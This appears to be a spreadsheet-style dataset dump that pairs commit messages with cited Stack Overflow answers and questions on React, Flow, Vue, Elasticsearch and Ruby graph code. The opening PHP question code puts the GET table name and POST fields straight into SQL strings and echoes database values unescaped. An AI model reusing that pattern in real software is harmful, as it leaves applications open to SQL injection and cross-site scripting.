        &amp;lt;option value=&amp;quot;table4&amp;quot;&amp;gt;3-Location3&amp;lt;/option&amp;gt;
        &amp;lt;option value=&amp;quot;table5&amp;quot;&amp;gt;4-Location4&amp;lt;/option&amp;gt;
        &amp;lt;option value=&amp;quot;table6&amp;quot;&amp;gt;5-Location5&amp;lt;/option&amp;gt;
        &amp;lt;option value=&amp;quot;table7&amp;quot;&amp;gt;6-Location6&amp;lt;/option&amp;gt;
        &amp;lt;option value=&amp;quot;table8&amp;quot;&amp;gt;7-Location7&amp;lt;/option&amp;gt;
        &amp;lt;option value=&amp;quot;table9&amp;quot;&amp;gt;8-Location8&amp;lt;/option&amp;gt;
        &amp;lt;option value=&amp;quot;table10&amp;quot;&amp;gt;9-Location9&amp;lt;/option&amp;gt;
        &amp;lt;option value=&amp;quot;table11&amp;quot;&amp;gt;10-Location10&amp;lt;/option&amp;gt;
    &amp;lt;/select&amp;gt;
    &amp;lt;div id=&amp;quot;tableData&amp;quot;&amp;gt;
        &amp;lt;!-- Table data will be inserted here dynamically --&amp;gt;
    &amp;lt;/div&amp;gt;
&amp;lt;script src=&amp;quot;https://code.jquery.com/jquery-1.10.2.js&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and the function77.php&lt;/p&gt;
&lt;pre class="lang-php prettyprint-override"&gt;&lt;code&gt;&amp;lt;?php
require_once &amp;quot;dbcontroller555.php&amp;quot;;
// Initialize DBController instance
$db_handle = new DBController();
// Function to validate and clean input data
function cleanInput($data) {
    // Trim whitespaces and sanitize input to prevent XSS
    return htmlspecialchars(trim($data));
}
// Check if table is selected via GET request
if (isset($_GET['table'])) {
    $table = $_GET['table'];
    try {
        // Fetch rows from the selected table
        $sql = &amp;quot;SELECT * FROM $table ORDER BY CAST(id AS UNSIGNED) DESC&amp;quot;;
        $stmt = $db_handle-&amp;gt;getConnection()-&amp;gt;prepare($sql);
        $stmt-&amp;gt;execute();
        $productResult = $stmt-&amp;gt;fetchAll(PDO::FETCH_ASSOC);
        // Check if any rows are returned
       if (!empty($productResult)) {
    echo &amp;quot;
&amp;lt;script&amp;gt;
// This function is user to insert data in database
    $('#btnSaveAction').on('click', function () {
        params = ''
        $('td[contentEditable=\&amp;quot;true\&amp;quot;]').each(function () {
            if ($(this).text() != '') {
                if (params != '') {
                    params += '&amp;amp;';
                }
                params += $(this).data('id') + '=' + $(this).text();
            }
        });
        if (params != '') {
             alert(params);// santize data
            $.ajax({
                url: 'function.php',
                type: 'POST',
                data: params,
                success: function (response) {
                    $('#ajax-response').append(response);
                    $('td[contentEditable=\&amp;quot;true\&amp;quot;]').text('');
                }
            });
            return false;
        }
    });
    // This function is used for edit the row to make it editable
    $('#tbl').on('click', '.edit', function () {
        $('#tbl').find('.save, .cancel').hide();
        $('#tbl').find('.edit').show();
        $(this).hide().siblings('.save, .cancel').show();
        $(this).closest('td').siblings().each(
            function () {
                var inp = $(this).find('input');
                if (inp.length) {
                    $(this).text(inp.val());
                } else {
                    var t = $(this).text();
                    $(this).attr('contentEditable', 'true');
                }
            });
    });
    // This function is used for edit the row to make it editable
    $('#tbl').on('click', '.cancel', function () {
        $('#tbl').find('.save, .cancel').hide();
        $(this).hide().siblings('.edit').show();
        $(this).closest('td').siblings().each(
            function () {
                $(this).attr('contentEditable', 'false');
                location.reload();
            });
    });
    // This function is used for saving the edit data in database
    $('#tbl').on('click', '.save', function () {
        var $btn = $(this);
        $('#tbl').find('.save, .cancel').hide();
        $btn.hide().siblings('.edit').show();
        params = '';
        var id = $btn.data('id');
        $(this).closest('td').siblings().each(function () {
            $(this).attr('contentEditable', 'false');
            if (params != '') {
                params += '&amp;amp;';
            }
            params += $(this).data('id') + '=' + $(this).text();
        });
        params += '&amp;amp;id' + '=' + id;
           alert(params);// santize data
        if (params != '') {
            $.ajax({
                url: 'function.php',
                type: 'POST',
                data: params,
                success: function (response) {
                    $('#ajax-response').append(response);
                    // $('td[contentEditable='true']').text('');
                }
            });
            return false;
        }
    });
    // this ajax is using for deleting the row 
    $('#tbl').on('click', '.del', function () {
        var el = this;
        var deleteid = $(this).data('id');
        console.log(deleteid);
        var confirmalert = confirm('Are you sure?');
        if (confirmalert == true) {
            $.ajax({
                url: 'function.php',
                type: 'POST',
                data: {
                    id: deleteid,
                    action: 'del'
                },
                success: function (response) {
                    if (response == 1) {
                        // Remove row from HTML Table
                        $(el).closest('tr').css('background', 'tomato');
                        $(el).closest('tr').fadeOut(800, function () {
                            $(this).remove();
                        });
                    } else {
                        alert('Invalid ID.');
                    }
                }
            });
        }
    });
&amp;lt;/script&amp;gt;
&amp;lt;script src='https://code.jquery.com/jquery-1.10.2.js'&amp;gt;&amp;lt;/script&amp;gt;
    &amp;lt;div class='container'&amp;gt;
        &amp;lt;div id='add-product'&amp;gt;
            &amp;lt;div class='txt-heading'&amp;gt;Add Location&amp;lt;/div&amp;gt;
            &amp;lt;p id='statusMessage' style='color: green; display: none;'&amp;gt;&amp;lt;/p&amp;gt;
            &amp;lt;table cellpadding='10' cellspacing='1' border='1'&amp;gt;
                &amp;lt;tbody&amp;gt;
                    &amp;lt;tr&amp;gt;
                        &amp;lt;th&amp;gt;&amp;lt;strong&amp;gt;Name&amp;lt;/strong&amp;gt;&amp;lt;/th&amp;gt;
                        &amp;lt;th&amp;gt;&amp;lt;strong&amp;gt;Manager&amp;lt;/strong&amp;gt;&amp;lt;/th&amp;gt;
                        &amp;lt;th&amp;gt;&amp;lt;strong&amp;gt;Address&amp;lt;/strong&amp;gt;&amp;lt;/th&amp;gt;
                        &amp;lt;th&amp;gt;&amp;lt;strong&amp;gt;Phone&amp;lt;/strong&amp;gt;&amp;lt;/th&amp;gt;
                        &amp;lt;th&amp;gt;&amp;lt;strong&amp;gt;Fax&amp;lt;/strong&amp;gt;&amp;lt;/th&amp;gt;
                        &amp;lt;th&amp;gt;&amp;lt;strong&amp;gt;Hours&amp;lt;/strong&amp;gt;&amp;lt;/th&amp;gt;
                    &amp;lt;/tr&amp;gt;
                    &amp;lt;tr&amp;gt;
                        &amp;lt;td contentEditable='true' data-id='Name'&amp;gt;&amp;lt;/td&amp;gt;
                        &amp;lt;td contentEditable='true' data-id='Manager'&amp;gt;&amp;lt;/td&amp;gt;
                        &amp;lt;td contentEditable='true' data-id='Address'&amp;gt;&amp;lt;/td&amp;gt;
                        &amp;lt;td contentEditable='true' data-id='Telephone' style='text-align:right;'&amp;gt;&amp;lt;/td&amp;gt;
                        &amp;lt;td contentEditable='true' data-id='Fax'&amp;gt;&amp;lt;/td&amp;gt;
                        &amp;lt;td contentEditable='true' data-id='Hours' style='text-align:right;'&amp;gt;&amp;lt;/td&amp;gt;
                    &amp;lt;/tr&amp;gt;
                &amp;lt;/tbody&amp;gt;
            &amp;lt;/table&amp;gt;
            &amp;lt;br&amp;gt;
            &amp;lt;div id='btnSaveAction'&amp;gt;Insert&amp;lt;/div&amp;gt;
        &amp;lt;/div&amp;gt;
        &amp;lt;br&amp;gt;
        &amp;lt;div id='list-product'&amp;gt;
            &amp;lt;div class='txt-heading'&amp;gt;Products&amp;lt;/div&amp;gt;
            &amp;lt;table id='tbl' cellpadding='10' cellspacing='1' border='1'&amp;gt;
                &amp;lt;tbody id='ajax-response'&amp;gt;
                    &amp;lt;tr&amp;gt;
                        &amp;lt;th&amp;gt;&amp;lt;strong&amp;gt;Name&amp;lt;/strong&amp;gt;&amp;lt;/th&amp;gt;
                        &amp;lt;th&amp;gt;&amp;lt;strong&amp;gt;Manager&amp;lt;/strong&amp;gt;&amp;lt;/th&amp;gt;
                        &amp;lt;th&amp;gt;&amp;lt;strong&amp;gt;Address&amp;lt;/strong&amp;gt;&amp;lt;/th&amp;gt;
                        &amp;lt;th&amp;gt;&amp;lt;strong&amp;gt;Phone&amp;lt;/strong&amp;gt;&amp;lt;/th&amp;gt;
                        &amp;lt;th&amp;gt;&amp;lt;strong&amp;gt;Fax&amp;lt;/strong&amp;gt;&amp;lt;/th&amp;gt;
                        &amp;lt;th&amp;gt;&amp;lt;strong&amp;gt;Hours&amp;lt;/strong&amp;gt;&amp;lt;/th&amp;gt;
                        &amp;lt;th&amp;gt;&amp;lt;strong&amp;gt;Actions&amp;lt;/strong&amp;gt;&amp;lt;/th&amp;gt;
                    &amp;lt;/tr&amp;gt;
    &amp;quot;;
    foreach ($productResult as $row) { 
        echo &amp;quot;&amp;lt;tr&amp;gt;
                &amp;lt;td data-id='Name'&amp;gt;&amp;quot; . htmlspecialchars($row['Name']) . &amp;quot;&amp;lt;/td&amp;gt;
                &amp;lt;td data-id='Manager'&amp;gt;&amp;quot; . htmlspecialchars($row['Manager']) . &amp;quot;&amp;lt;/td&amp;gt;
                &amp;lt;td data-id='Address'&amp;gt;&amp;quot; . htmlspecialchars($row['Address']) . &amp;quot;&amp;lt;/td&amp;gt;
                &amp;lt;td data-id='Telephone'&amp;gt;&amp;quot; . htmlspecialchars($row['Telephone']) . &amp;quot;&amp;lt;/td&amp;gt;
                &amp;lt;td data-id='Fax'&amp;gt;&amp;quot; . htmlspecialchars($row['Fax']) . &amp;quot;&amp;lt;/td&amp;gt;
                &amp;lt;td data-id='Hours'&amp;gt;&amp;quot; . htmlspecialchars($row['Hours']) . &amp;quot;&amp;lt;/td&amp;gt;
                &amp;lt;td&amp;gt;
&amp;lt;button class='edit btn btn-success'&amp;gt;&amp;lt;i class='fa fa-pencil' aria-hidden='true'&amp;gt;&amp;lt;/i&amp;gt;&amp;lt;/button&amp;gt;
&amp;lt;button type='button' id='edit' class='save btn btn-success' data-id='&amp;quot; . htmlspecialchars($row['id']) . &amp;quot;'
    style='display: none'&amp;gt;&amp;lt;i class='fa fa-check' aria-hidden='true'&amp;gt;&amp;lt;/i&amp;gt;&amp;lt;/button&amp;gt;
&amp;lt;button type='button' id='edit' class='cancel btn btn-danger' style='display: none'&amp;gt;&amp;lt;i class='fa fa-times'
        aria-hidden='true'&amp;gt;&amp;lt;/i&amp;gt;&amp;lt;/button&amp;gt;
&amp;lt;button class='del btn btn-warning' data-id='&amp;quot; . htmlspecialchars($row['id']) . &amp;quot;'&amp;gt;&amp;lt;i class='fa fa-trash'
        aria-hidden='true'&amp;gt;&amp;lt;/i&amp;gt;&amp;lt;/button&amp;gt;
                &amp;lt;/td&amp;gt;
            &amp;lt;/tr&amp;gt;&amp;quot;;
    }
    echo &amp;quot;
                &amp;lt;/tbody&amp;gt;
            &amp;lt;/table&amp;gt;
        &amp;lt;/div&amp;gt;
    &amp;lt;/div&amp;gt;
    &amp;quot;;
} else {
    echo &amp;quot;No data found in this table.&amp;quot;;
}
    } catch (PDOException $e) {
        echo &amp;quot;Error fetching data: &amp;quot; . $e-&amp;gt;getMessage();
    }
    if (isset($_POST['Name'])) {
   $id = &amp;quot;&amp;quot;;
    $Name = &amp;quot;&amp;quot;;
    $Manager = &amp;quot;&amp;quot;;
    $Address = &amp;quot;&amp;quot;;
    $Telephone = &amp;quot;&amp;quot;;
    $Fax = &amp;quot;&amp;quot;;
    $Hours = &amp;quot;&amp;quot;;
     if (!empty($_POST[&amp;quot;id&amp;quot;])) {
        $id = $db_handle-&amp;gt;cleanData($_POST[&amp;quot;id&amp;quot;]);
    }
    if (!empty($_POST[&amp;quot;Name&amp;quot;])) {
        $Name = $db_handle-&amp;gt;cleanData($_POST[&amp;quot;Name&amp;quot;]);
    }
    if (!empty($_POST[&amp;quot;Manager&amp;quot;])) {
        $Manager = $db_handle-&amp;gt;cleanData($_POST[&amp;quot;Manager&amp;quot;]);
    }
    if (!empty($_POST[&amp;quot;Address&amp;quot;])) {
        $Address = $db_handle-&amp;gt;cleanData($_POST[&amp;quot;Address&amp;quot;]);
    }
    if (!empty($_POST[&amp;quot;Telephone&amp;quot;])) {
        $Telephone = $db_handle-&amp;gt;cleanData($_POST[&amp;quot;Telephone&amp;quot;]);
    }
  if (!empty($_POST[&amp;quot;Fax&amp;quot;])) {
        $Fax = $db_handle-&amp;gt;cleanData($_POST[&amp;quot;Fax&amp;quot;]);
    }
      if (!empty($_POST[&amp;quot;Hours&amp;quot;])) {
        $Hours = $db_handle-&amp;gt;cleanData($_POST[&amp;quot;Hours&amp;quot;]);
    }
    if (isset($_POST['id'])) {
        $sql = &amp;quot;UPDATE
        maploc
    SET
        Name = '$Name',
        Manager = '$Manager',
        Address = '$Address',
        Telephone = '$Telephone',
        Fax = '$Fax',
        Hours = '$Hours'
    WHERE
        maploc.id = $id&amp;quot;;
    } else {
        $sql = &amp;quot;INSERT INTO
    maploc (Name,Manager,Address,Telephone,Fax,Hours)
          VALUES ('&amp;quot; . $Name . &amp;quot;','&amp;quot; . $Manager . &amp;quot;','&amp;quot; . $Address . &amp;quot;','&amp;quot; . $Telephone . &amp;quot;','&amp;quot; . $Fax . &amp;quot;','&amp;quot; . $Hours . &amp;quot;')&amp;quot;;
    }
    $id = $db_handle-&amp;gt;executeInsert($sql);
    if (!empty($id)) {
  $sql = &amp;quot;SELECT * FROM maploc ORDER BY CAST(id AS UNSIGNED) DESC&amp;quot;;
        $productResult = $db_handle-&amp;gt;readData($sql);
    }
    ?&amp;gt;
&amp;lt;?php
if (!empty($productResult)) {
?&amp;gt;
&amp;lt;tr&amp;gt;
    &amp;lt;td data-id=&amp;quot;Name&amp;quot;&amp;gt;&amp;lt;?php echo $productResult[0][&amp;quot;Name&amp;quot;]; ?&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;td data-id=&amp;quot;Manager&amp;quot;&amp;gt;&amp;lt;?php echo $productResult[0][&amp;quot;Manager&amp;quot;]; ?&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td data-id=&amp;quot;Address&amp;quot;&amp;gt;&amp;lt;?php echo $productResult[0][&amp;quot;Address&amp;quot;]; ?&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;td data-id=&amp;quot;Telephone&amp;quot;&amp;gt;&amp;lt;?php echo $productResult[0][&amp;quot;Telephone&amp;quot;]; ?&amp;gt;&amp;lt;/td&amp;gt;
     &amp;lt;td data-id=&amp;quot;Fax&amp;quot;&amp;gt;&amp;lt;?php echo $productResult[0][&amp;quot;Fax&amp;quot;]; ?&amp;gt;&amp;lt;/td&amp;gt;
         &amp;lt;td data-id=&amp;quot;Hours&amp;quot;&amp;gt;&amp;lt;?php echo $productResult[0][&amp;quot;Hours&amp;quot;]; ?&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;td&amp;gt;
        &amp;lt;button class=&amp;quot;edit btn btn-success&amp;quot;&amp;gt;&amp;lt;i class=&amp;quot;fa fa-pencil&amp;quot; aria-hidden=&amp;quot;true&amp;quot;&amp;gt;&amp;lt;/i&amp;gt;&amp;lt;/button&amp;gt;
        &amp;lt;button type=&amp;quot;button&amp;quot; id=&amp;quot;edit&amp;quot; class=&amp;quot;save btn btn-success&amp;quot; data-id=&amp;quot;&amp;lt;?php echo $productResult[0][&amp;quot;id&amp;quot;]; ?&amp;gt;&amp;quot;
            style=&amp;quot;display: none&amp;quot;&amp;gt;&amp;lt;i class=&amp;quot;fa fa-check&amp;quot; aria-hidden=&amp;quot;true&amp;quot;&amp;gt;&amp;lt;/i&amp;gt;&amp;lt;/button&amp;gt;
        &amp;lt;button type=&amp;quot;button&amp;quot; id=&amp;quot;edit&amp;quot; class=&amp;quot;cancel btn btn-danger&amp;quot; style=&amp;quot;display: none&amp;quot;&amp;gt;&amp;lt;i class=&amp;quot;fa fa-times&amp;quot;
                aria-hidden=&amp;quot;true&amp;quot;&amp;gt;&amp;lt;/i&amp;gt;&amp;lt;/button&amp;gt;
        &amp;lt;button class=&amp;quot;del btn btn-warning&amp;quot; data-id=&amp;quot;&amp;lt;?php echo $productResult[0][&amp;quot;id&amp;quot;]; ?&amp;gt;&amp;quot;&amp;gt;&amp;lt;i class=&amp;quot;fa fa-trash&amp;quot;
                aria-hidden=&amp;quot;true&amp;quot;&amp;gt;&amp;lt;/i&amp;gt;&amp;lt;/button&amp;gt;
    &amp;lt;/td&amp;gt;
&amp;lt;/tr&amp;gt;
&amp;lt;?php
}
}
//echo '&amp;lt;script&amp;gt;';
//echo 'console.log(&amp;quot;it ran&amp;quot;);';
//echo '&amp;lt;/script&amp;gt;';
?&amp;gt;
&amp;lt;?php  
$id = 0;
if (isset($_POST['action']) == 'del') {
    $id = $db_handle-&amp;gt;cleanData($_POST[&amp;quot;id&amp;quot;]);
}
if ($id &amp;gt; 0) {
    // Check record exists
    $sql = &amp;quot;SELECT * from maploc WHERE id = '$id' &amp;quot;;
    $productResult = $db_handle-&amp;gt;readData($sql);
    if ($productResult &amp;gt; 0) {
        // Delete record
        $query = &amp;quot;DELETE FROM maploc WHERE id=&amp;quot; . $productResult[0]['id'];
        $db_handle-&amp;gt;executeInsert($query);
        echo 1;
        exit;
    } else {
        echo 0;
        exit;
    }
}
}//isset(GET['table']
//if ($_SERVER['REQUEST_METHOD'] === 'POST') {
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C124</t>
  </si>
  <si>
    <t>Add Feature to Print Client Roster
- ClientRoster is in Modals folder but is technically it's own window.
- Added `react-new-window` component so that ClientRoster.tsx can act as its own window.
- To get printing to work See: https://stackoverflow.com/a/67445633/4323201</t>
  </si>
  <si>
    <t>I was trying to do something similar but wanted the popup window to print when it opened.
Here's the solution (using React hooks):
import React, {useEffect, useRef} from 'react';
import NewWindow from "react-new-window";
const PopupWindow = () =&gt; {
    const thisWindow = useRef(null);
    // This will fire when thisWindow reference changes.
    useEffect(() =&gt; {
        thisWindow.current.window.focus();
        // thisWindow.current.window.print();  // To print when the popup window loads.
    }, [thisWindow]);
    return (
        &lt;&gt;
            &lt;NewWindow
                ref={thisWindow}
            &gt;
                &lt;p&gt;
                   Your content here
                &lt;/p&gt;
            &lt;/NewWindow&gt;
        &lt;/&gt;
    )
}
export default PopupWindow;</t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to understand the concepts behind DDD, but I find it hard to understand just by reading books as they tend to discuss the topic in a rather abstract way. I would like to see some good implementations of DDD in code, preferably in C#.
Are there any good examples of projects practicing DDD in the open source world?
</t>
  </si>
  <si>
    <t>C125</t>
  </si>
  <si>
    <t>[RFR] Documentation fixes
- [x] Fixed bad links for authorization chapters
- [x] Fixed mention of a ReferenceManyInput which does not exist (see [stackoverflow](https://stackoverflow.com/questions/46486514/input-components-not-working/46500718)</t>
  </si>
  <si>
    <t>Don't you have an error in the console about ReferenceManyInput ?  This component does not exist.
I checked the documentation and we indeed included it in the Resources chapter. It will be fixed soon.
For referencing many other resources, you should use the [ReferenceArrayInput](`http://127.0.0.1:4000/Inputs.html#referencearrayinput). However, it does not support Datagrids. There are not components allowing you to edit related resources yet.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was following this documentation page from Elastic Search
&lt;a href="https://www.elastic.co/guide/en/elasticsearch/reference/current/bring-your-own-vectors.html" rel="nofollow noreferrer"&gt;https://www.elastic.co/guide/en/elasticsearch/reference/current/bring-your-own-vectors.html&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I have stored the vectors already and tried to query the documents against another vector embedding but every hit returns the same score.&lt;/p&gt;
&lt;p&gt;Here's my mapping inside a create_index function&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def create_index(es_client, index_name, dim):
    # Define index settings and mappings
    mapping = {
        &amp;quot;mappings&amp;quot;: {
            &amp;quot;properties&amp;quot;: {
                &amp;quot;page_id&amp;quot;: {&amp;quot;type&amp;quot;: &amp;quot;keyword&amp;quot;},
                &amp;quot;chunk_id&amp;quot;: {&amp;quot;type&amp;quot;: &amp;quot;keyword&amp;quot;},
                &amp;quot;embedding&amp;quot;: {
                    &amp;quot;index&amp;quot;: True,  # set to true to enable the use of the knn query
                    &amp;quot;type&amp;quot;: &amp;quot;dense_vector&amp;quot;,
                    &amp;quot;dims&amp;quot;: dim,
                    &amp;quot;similarity&amp;quot;: &amp;quot;cosine&amp;quot;,
                },
            }
        }
    }
    if es_client.indices.exists(index=index_name):
        print(f&amp;quot;Index {index_name} already exists.&amp;quot;)
    else:
        es_client.indices.create(index=index_name, body=mapping)
        print(f&amp;quot;Index {index_name} created successfully.&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And here's the query wrapped in a function&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def search_similar_documents(user_embedding, top_k=3):
    &amp;quot;&amp;quot;&amp;quot;
    Perform a k-NN semantic search in Elasticsearch.
    :param user_embedding: List of floats representing the user's query embedding.
    :param top_k: Number of similar documents to retrieve.
    :return: List of document IDs.
    &amp;quot;&amp;quot;&amp;quot;
    query = {
        &amp;quot;knn&amp;quot;: {
            &amp;quot;field&amp;quot;: &amp;quot;embedding&amp;quot;,
            &amp;quot;query_vector&amp;quot;: user_embedding,
            &amp;quot;k&amp;quot;: top_k,  
            &amp;quot;num_candidates&amp;quot;: 100, 
        },
        &amp;quot;_source&amp;quot;: [&amp;quot;page_id&amp;quot;, &amp;quot;chunk_id&amp;quot;], 
    }
    return es_client.search(index=ELASTICSEARCH_INDEX_NAME, body=query)
response = search_similar_documents(human_input_embedded, top_k=20)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;All 20 hits have the same score!&lt;/p&gt;
&lt;p&gt;I don't have the text field on my mapping. Could that be the issue? I have the text field stored in a Neo4J for another purpose.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C126</t>
  </si>
  <si>
    <t>Convert App.js to Class component, type check it using Flow
- Create State type that checks the types of local state variables
- Ensure render() is typed with React.Node so App returns a React component
- Type the arrow function class methods using approach in https://stackoverflow.com/a/65084912</t>
  </si>
  <si>
    <t>Firstly you're getting these errors probably because you updated from an old version that didn't have types-first on by default. Explained here.
To solve your issue you can type your class like so
export class SomeActions {
  _interval: IntervalID;
  _isPolling: boolean;
  _dispatchUpdate: DownloadItems[] =&gt; void = (downloadItems) =&gt; {
    AppDispatcher.dispatch({
      actionType: CONSTANT.CONSTANT,
      downloadItems,
    });
  }
}
export default (new SomeActions(): SomeActions);
Because you're exporting new Class you have to declare the type of that also explicitly, otherwise just export default SomeActions; is sufficient.</t>
  </si>
  <si>
    <t xml:space="preserve">This question may sound fairly elementary, but this is a debate I had with another developer I work with.
I was taking care to stack allocate things where I could, instead of heap allocating them. He was talking to me and watching over my shoulder and commented that it wasn't necessary because they are the same performance wise.
I was always under the impression that growing the stack was constant time, and heap allocation's performance depended on the current complexity of the heap for both allocation (finding a hole of the proper size) and de-allocating (collapsing holes to reduce fragmentation, as many standard library implementations take time to do this during deletes if I am not mistaken).
This strikes me as something that would probably be very compiler dependent. For this project in particular I am using a [external-link] compiler for the [external-link] architecture. Insight on this combination would be most helpful, but in general, for GCC, and MSVC++, what is the case? Is heap allocation not as high performing as stack allocation? Is there no difference? Or are the differences so minute it becomes pointless micro-optimization.
</t>
  </si>
  <si>
    <t>C127</t>
  </si>
  <si>
    <t>Create LinkedButton component for a routing button
- credit to https://stackoverflow.com/a/49439893/9651253
- use it in the Favorites section</t>
  </si>
  <si>
    <t>LinkButton component - a solution for React Router v4
First, a note about many other answers to this question.
⚠️ Nesting &lt;button&gt; and &lt;a&gt; is not valid html. ⚠️
Any answer here which suggests nesting a html button in a React Router Link component (or vice-versa) will render in a web browser, but it is not semantic, accessible, or valid html:
&lt;a stuff-here&gt;&lt;button&gt;label text&lt;/button&gt;&lt;/a&gt;
&lt;button&gt;&lt;a stuff-here&gt;label text&lt;/a&gt;&lt;/button&gt;
☝Click to validate this markup with validator.w3.org ☝
This can lead to layout/styling issues as buttons are not typically placed inside links.
Using an html &lt;button&gt; tag with React Router &lt;Link&gt; component.
If you only want  an html button tag
&lt;button&gt;label text&lt;/button&gt;
then, here's the right way to get a button that works like React Router’s Link component
Use React Router’s withRouter HOC to pass these props to your component:
history
location
match
staticContext
LinkButton component
Here’s a LinkButton component for you to copy/pasta:
// file: /components/LinkButton.jsx
import React from 'react'
import PropTypes from 'prop-types'
import { withRouter } from 'react-router'
const LinkButton = (props) =&gt; {
  const {
    history,
    location,
    match,
    staticContext,
    to,
    onClick,
    // ⬆ filtering out props that `button` doesn’t know what to do with.
    ...rest
  } = props
  return (
    &lt;button
      {...rest} // `children` is just another prop!
      onClick={(event) =&gt; {
        onClick &amp;&amp; onClick(event)
        history.push(to)
      }}
    /&gt;
  )
}
LinkButton.propTypes = {
  to: PropTypes.string.isRequired,
  children: PropTypes.node.isRequired
}
export default withRouter(LinkButton)
Then import the component:
import LinkButton from '/components/LinkButton'
Use the component:
&lt;LinkButton to='/path/to/page'&gt;Push My Buttons!&lt;/LinkButton&gt;
If you need an onClick method:
&lt;LinkButton
  to='/path/to/page'
  onClick={(event) =&gt; {
    console.log('custom event here!', event)
  }}
&gt;Push My Buttons!&lt;/LinkButton&gt;
Update: If you're looking for another fun option made available after the above was written, check out this useRouter hook.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Konva.js to draw interactive shapes on top of an existing HTML element on the page, like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div id=&amp;quot;mainContainer&amp;quot;&amp;gt;
    &amp;lt;div id=&amp;quot;otherStuff&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;
    &amp;lt;div id=&amp;quot;konvaContainer&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;where both inner divs are set to &lt;code&gt;position: absolute;&lt;/code&gt; so they fill the container and overlap each other.&lt;/p&gt;
&lt;p&gt;I'm then initializing Konva and drawing a shape like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const stage = new Konva.Stage({
    container: konvaContainer,
    width: konvaContainer.clientWidth,
    height: konvaContainer.clientHeight,
});
const layer = new Konva.Layer();
stage.add(layer);
const circle = new Konva.Circle({
    radius: 50,
    fill: 'red',
    draggable: true,
    x: stage.width() / 2,
    y: stage.height() / 2,
});
layer.add(circle);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The behavior I'm looking for is for the circle I've drawn to respond to mouse interactions (click, drag, etc.), but everywhere else on the stage (where there are no shapes) should be &amp;quot;transparent&amp;quot; to the mouse. In other words: the events should pass through and hit the underlying &lt;code&gt;otherStuff&lt;/code&gt; div.&lt;/p&gt;
&lt;p&gt;Is this possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C128</t>
  </si>
  <si>
    <t>Implementation of Tarjan's strongly connected components algorithm
See http://stackoverflow.com/a/9732288</t>
  </si>
  <si>
    <t>I asked the same question in the math stackexchange site, and got an answer. It turned out that Tarjan's algorithm is good for solving this problem. I implemented it in Ruby as follows:
module DirectedGraph; module_function
	## Tarjan's algorithm
	def strongly_connected_components graph
		@index, @stack, @indice, @lowlink, @scc = 0, [], {}, {}, []
		@graph = graph
		@graph.flatten(1).uniq.each{|v| strong_connect(v) unless @indice[v]}
		@scc
	end
	def strong_connect v
		@indice[v] = @index
		@lowlink[v] = @index
		@index += 1
		@stack.push(v)
		@graph.each do |vv, w|
			next unless vv == v
			if !@indice[w]
				strong_connect(w)
				@lowlink[v] = [@lowlink[v], @lowlink[w]].min
			elsif @stack.include?(w)
				@lowlink[v] = [@lowlink[v], @indice[w]].min
			end
		end
		if @lowlink[v] == @indice[v]
			i = @stack.index(v)
			@scc.push(@stack[i..-1])
			@stack = @stack[0...i]
		end
	end
end
So if I apply it to the example above, I get a list of strongly connected components of the graph:
example_graph = [[1, 2], [2, 3], [3, 4], [3, 5], [3, 6], [6, 2]]
DirectedGraph.strongly_connected_components(example_graph)
#=&gt; [[4], [5], [2, 3, 6], [1]]
By selecting those components that are longer than one, I get the cycles:
DirectedGraph.strongly_connected_components(example_graph)
.select{|a| a.length &gt; 1}
#=&gt; [[2, 3, 6]]
And further if I select from the graph the edges whose both vertices are included in the components, I get the crucial edges that constitute the cycles:
DirectedGraph.strongly_connected_components(example_graph)
.select{|a| a.length &gt; 1}
.map{|a| example_graph.select{|v, w| a.include?(v) and a.include?(w)}}
#=&gt; [[[2, 3], [3, 6], [6, 2]]]</t>
  </si>
  <si>
    <t xml:space="preserve">I need to queue events and tasks for external systems in a reliable/transactional way.  Using things like MSMQ or ActiveMQ look very seductive, but the transactional part becomes complicated (MSDTC, etc).
We could use the database (SQL Server 2005+, Oracle 9+) and achieve easier transactional support, but the queuing part becomes uglier.
Neither route seems all that great and is filled with nasty gotchas and edge cases.
Can someone offer some practical guidance in this matter?
Think: E/C/A or a scheduled task engine that wakes up every so often and see if there are any scheduled tasks that need running at this time (i.e. next-run-date has passed, but expiration-date has not yet been reached).
</t>
  </si>
  <si>
    <t>C129</t>
  </si>
  <si>
    <t>solve list render problem in TheGroceryForm by adding vue component c
losing tags, see https://stackoverflow.com/a/52807759/2145103</t>
  </si>
  <si>
    <t>You should avoid using self closing tags.
https://github.com/vuejs/vue/issues/1036
So your TheGroceryForm.vue will be
&lt;template&gt;
	&lt;form action="/submit" method="POST"&gt;
		&lt;ol class="list-reset border rounded"&gt;
			&lt;li class="item" v-for="item in allGroceryItems" v-bind:key="item._id"&gt;
        &lt;GroceryFormItemEditLink&gt;&lt;/GroceryFormItemEditLink&gt;
        &lt;GroceryFormItemCheckboxInput :slug="item.slug"&gt;&lt;/GroceryFormItemCheckboxInput&gt;
        &lt;GroceryFormItemCheckboxLabel :slug="item.slug" :name="item.name"&gt;&lt;/GroceryFormItemCheckboxLabel&gt;
        &lt;GroceryFormItemQtySelector :slug="item.slug"&gt;&lt;/GroceryFormItemQtySelector&gt;
        &lt;GroceryFormItemStoresSelector
